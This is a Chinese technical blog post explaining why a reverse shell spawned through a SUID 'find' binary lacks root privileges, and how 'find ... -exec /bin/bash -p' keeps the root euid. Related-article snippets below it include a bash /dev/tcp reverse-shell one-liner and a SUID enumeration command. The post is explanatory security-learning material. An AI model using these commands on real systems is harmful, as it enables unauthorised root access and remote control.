shell root权限_为什么通过 find SUID 提权反弹的 shell 不是 root 权限?

最新推荐文章于 2023-08-28 10:02:46 发布
最新推荐文章于 2023-08-28 10:02:46 发布
阅读量405 收藏 1
点赞数 3
文章标签: shell root权限

提权的时候遇到了这种情况,故简单记录一下。

通过 find 命令执行命令 whoami ,可以看到确实是 root 用户:

5364b5f74ec46035e047eb6cd268faee.png

但如果我们尝试使用 nc 反弹 shell 回来,会发现权限还是普通用户 alice:

79feb8306b428c8b5da49c70f29f7b4c.png

这就很奇怪了,所以决定探究一下。

使用 find 执行 id 命令:

9b3a043473506354743a0346a13b0a18.png

在反弹回的 shell 中执行 id 命令:

d454667bd6be47bbafd8876597e7cb7b.png

经过对比发现,find 执行 id 时,有一个 euid 为 root 权限,但是反弹 shell 中并没有。

何为 euid?euid 就是我们通常说的 suid, 或者叫 excute user id,它使文件执行时拥有该文件所有者的权限。

为了查看反弹 shell 的 euid,我通过执行 id -u 来查看:

c5c9cff65e19ca37e0a01f13092c25c3.png

可以看到该 shell 的 euid 为 1000,所以当然没有 root 权限。

现在搞清了出为什么 find 反弹回来的 shell 不具有 root 权限,那怎样才能是反弹回来的 shell 具有 root 权限呢?——这就需要使用到 bash 命令的 -p 参数。

默认情况下 bash 在执行时,如果发现 euid 和 uid 不匹配,会将 euid(即 suid) 强制重置为uid 。如果使用了 -p 参数,则不会再覆盖。

我们尝试使用如下命令获取 shell:

find test -exec /bin/bash -p ;

3ca9f8cf88106a168a6d282d91b93056.png

可以看到获取的 shell 为 root 权限。

ps:这里也说明,我们获取 shell 不一样非得通过 nc 反弹~

weixin_39709178
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux使用suid vim.basic文件实现提权
09-14
主要介绍了Linux使用suid vim.basic文件实现提权,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
13671648877#MyNote#07_04_特殊权限suid等详解1
07-25
否则显示为S.用户权限不够查看:修改cat 命令,增加suid权限:现在用cat命令访问使用的是root属主则chloroplast用户可以查看:运行某程序时,
shell 文本处理及查找和文件查找
风二中的博客
08-10 2762
文章目录常用正则POSIX字符类findgrep创建空文件 常用正则 定义 释意 ? 0或1个 . 1个字符 * 设置其前一个字符任意次 POSIX字符类 定义 释意 [:space:] 空白字符 [:punct:] 指定标点 [:lower:] 小写字母 [:upper:] 大写字母 [:alpha:] 大小写字母 [:alnum:] 数和大小写字母 [:digit:] 数 iconv -f gbk -t utf8 ton.txt &
find命令提权反弹shell
a1ExT
08-28 114
拥有suid的程序发起的命令,命令所属不为发起该命令的用户所属,而是该程序所拥有的权限所属,也就是root
find命令提权以及反弹shell复现
qq_40898302的博客
04-21 7411
关于linux系统的find命令提权复现
浅谈反弹shell
weixin_53284312的博客
01-12 2232
反弹shell
linux suid提权原理,对SUID提权Root Shell的探究
weixin_35455135的博客
05-13 273
SUID是Linux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具来进行root提权。已知的可以用来提权的Linux可执行文件有:ØNmapØVimØfindØBashØMoreØLessØNanoØcp下面的命令可以发现所有的系统中运行的SUID可执行文件find / -user root -per...
Linux中特殊权限SUID、SGID与SBIT的深入讲解
09-15
linux对文件的权限管理简直是让人叹为观止,所以这篇文章主要给大家介绍了关于Linux中特殊权限SUID、SGID与SBIT的相关资料,文中通过示例代码介绍的非常详细,需要的朋友可以参考借鉴,下面随着小编来一起学习学习吧
Linux基础课件特殊权限设置SUID权限共10页.pdf
11-21
Linux基础课件特殊权限设置SUID权限共10页.pdf.zip
linux 权限 c,Linux下获取root权限的c程序
05-24
Linux下获取root权限的c程序 传递euid和egid给脚本,使脚本具有特殊用户的权限 使脚本实现类于设置了stick位的效果 shell, python, perl等脚本、程序不能取得suid,因为这些脚本程序需要解释器-/bin/bash, /usr/bin/...
linux中利用suid中的find进行root提权遇到的坑
rlenew的博客
12-28 2272
在Linux的提权方式中,有一种是根据suid进行提权suid特殊的文件属性,它允许用户执行的文件以该文件的拥有者的身份运行 其为文件赋予suid的命令是 chmod + s 文件 或者是 chmod 4755 文件 一般在获得一台Linux服务器的webshell后考虑提权,Linux下的方式多种多样,而这次主要是讲suid提权中遇到的坑。 find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f
059 提权反弹shell
鸡蛋炒鸡蛋
04-07 3958
文章目录一:权限提升概述二:windows提权2.1: 启动项提权2.2:系统漏洞提权2.2.1:笔记2.2.2:实验 一:权限提升概述 水平权限提升(越权) 同级账户间切换身份,比如有ABC三个用户,AB是普通用户只能自己发帖,然后只能删除自己的贴,C是管理员能删除所有人的帖子,然后突然A可以删除B的帖子了,这就是越权。 垂直权限提升 普通用户获得了管理员的权限 web用户直接提权成管理员用户     二:windows提权 前提: 基于webshell提权,也就是说目标机器存在大马文
Linux下反弹shell的种种方式
weixin_30423977的博客
04-06 152
[前言:在乌云社区看到反弹shell的几种姿势,看过之余自己还收集了一些,动手试了下,仅供参考] 0x01 Bash bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 这里shell由bash解析,有时候是由sh解析,不一定百发百中***在虚拟机里面试过可行,替换成自己的地址和端口即可******/dev/[tcp|upd]/h...
Suid之find提权靶机渗透实战
PANDA墨森的博客
07-11 1464
这是vulnhub靶机系列文章的第十一篇,本次主要知识点为:drupal漏洞利用,suid提权之find命令 靶机下载地址:https://www.vulnhub.com/entry/dc-1-1,292/ 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13229881.html #001 实验环境 攻击机:kali :192.168.136.129 靶机:192.168.136.136 #002 寻找靶机ip Kali下使用netdisco..
Linux中suid提权
qq_41123867的博客
03-18 2119
一、原理: 设置了SUID的文件可以让调用者以文件属主的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了 SUID详解 二、已知可用来提权的linux文件: nmap vim find bash more less nano cp 三、提权过程 1. 查看当前用户权限 在获得一个shell后,我们可以...
linux普通用户获取root权限的方法
千寻的博客
08-26 3337
三个特殊权限 方法1: t 粘滞位 (只对目录有效) 在目录中建立的文件只有文件的所属者可以删除。 方法一 chmod 777 /tmp/test chmod o+t /tmp/test t表示粘滞位 方法二 chmod 1777 /tmp/test sgid (只对目录有效) 在目录中建立的文件或者目录属组会继承父目录的属组 方法1 chmod 777 /tmp...
Ubuntu计划任务反弹shell提权
Longwaer
01-03 1594
学习Ubuntu计划任务反弹shell原理,了解掌握Linux提权新技巧。
mysql反弹提权_MySQL数据库反弹端口连接提权
weixin_42545292的博客
01-19 696
【51CTO.com原创稿件】在渗透或者安全评估时,有可能遇到一些比较奇葩的环境,即使通过Mysql root账号和密码获取了webshell,由于无法执行命令。在一般的情况下,也就放弃了。但其实可以换一种思路,通过mysql查询来直接提权,可以针对以下场景:(1)通过网站无法获取webshell(2)Webshell无法执行命令(3)有phpmyadmin和root账号,无法查询或者无法获取网...
curl 的suid 提权
最新发布
09-13
对于 curl 的 suid 提权,我可以给你一些建议,但是请注意使用 suid 提权可能存在安全风险,需要谨慎操作。 Suid 权限是一种权限设置,允许普通用户在执行特定可执行文件时以文件所有者的权限运行它。这种设置通常...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值